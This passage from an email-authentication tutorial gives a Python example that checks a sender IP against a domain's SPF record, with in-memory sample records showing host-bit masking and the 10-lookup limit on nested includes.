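The following added example (editor's code, not from the original post or from any SPF library) evaluates a record the way a receiving server does: it takes the connecting IP and the envelope-sender domain, walks the ip4, ip6, include and all terms in order, applies the qualifier of the first match, and enforces the 10-lookup limit across nested includes. It assumes standard-library Python only and uses ZONE, a constructed in-memory stand-in for DNS TXT data (a real checker would query DNS for each domain); the a, mx, ptr, exists and redirect= terms are deliberately left out.

```python
"""Evaluate an SPF record: connecting IP vs. the envelope-sender domain's policy (RFC 7208 check_host).

Added example. ZONE is constructed stand-in data for DNS TXT records; a real checker queries DNS.
"""
from __future__ import annotations

import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_DNS_LOOKUPS = 10  # RFC 7208 section 4.6.4: include, a, mx, ptr, exists and redirect all count

ZONE = {
    # the record from the text, plus constructed records for the other names
    "yourdomain.com": "v=spf1 ip4:22.23.24.25 include:another-domain-that-can-send-email-for-us.com -all",
    "another-domain-that-can-send-email-for-us.com": "v=spf1 ip4:12.13.14.0/24 ip6:2001:db8::/32 ~all",
    "misaligned.example": "v=spf1 ip4:22.23.24.0/20 -all",  # host bits set: evaluated as 22.23.16.0/20
    "open.example": "v=spf1 +all",                           # authorizes the entire Internet
    "loop.example": "v=spf1 include:loop.example -all",      # would recurse forever without the lookup limit
}


def parse_spf(record: str) -> list[tuple[str, str, str]]:
    """Split a record into (qualifier, mechanism, argument) triples; ValueError if it is not spf1."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an spf1 record")
    parsed = []
    for term in terms[1:]:
        qualifier = "+"  # no explicit qualifier means "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        parsed.append((qualifier, mechanism.lower(), argument))
    return parsed


def check_host(ip: str, domain: str, zone: dict[str, str], budget: list[int] | None = None) -> str:
    """Return pass, fail, softfail, neutral, none or permerror for ip sending as domain."""
    addr = ipaddress.ip_address(ip)
    budget = [MAX_DNS_LOOKUPS] if budget is None else budget  # shared across include recursion
    record = zone.get(domain.lower())
    if record is None:
        return "none"
    try:
        terms = parse_spf(record)
    except ValueError:
        return "permerror"
    for qualifier, mechanism, argument in terms:
        if mechanism == "all":
            return QUALIFIERS[qualifier]
        if mechanism in ("ip4", "ip6"):
            try:
                # strict=False masks host bits, as RFC 7208 does: 22.23.24.0/20 silently becomes 22.23.16.0/20
                network = ipaddress.ip_network(argument, strict=False)
            except ValueError:
                return "permerror"  # unparsable address or prefix
            if addr.version == network.version and addr in network:
                return QUALIFIERS[qualifier]
        elif mechanism == "include":
            budget[0] -= 1
            if budget[0] < 0:
                return "permerror"  # more than 10 DNS-querying terms in the whole evaluation
            result = check_host(ip, argument, zone, budget)
            if result == "pass":
                return QUALIFIERS[qualifier]
            if result in ("none", "permerror"):
                return "permerror"  # an included domain must itself have a valid record
        else:
            return "permerror"  # a, mx, ptr, exists and redirect= are left out of this example
    return "neutral"  # nothing matched and no all term: the receiver treats this like no statement


if __name__ == "__main__":
    for sender_ip in ("22.23.24.25", "12.13.14.200", "2001:db8::1", "198.51.100.7"):
        print(sender_ip, "->", check_host(sender_ip, "yourdomain.com", ZONE))
    print("22.23.17.1 vs misaligned.example ->", check_host("22.23.17.1", "misaligned.example", ZONE))
    print("loop.example ->", check_host("198.51.100.7", "loop.example", ZONE))
```

Two results are worth noticing. 22.23.17.1 passes against misaligned.example even though the administrator wrote 22.23.24.0/20, because the host bits are masked off, so a misaligned prefix quietly authorizes addresses the author never meant to list. And loop.example returns permerror rather than hanging, because the lookup budget is shared across the whole recursion, which is the same mechanism that makes an over-long chain of third-party includes fail in production.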


          We hope this helps. If you have any suggestions or doubts, add a comment and we will reply as soon as possible.
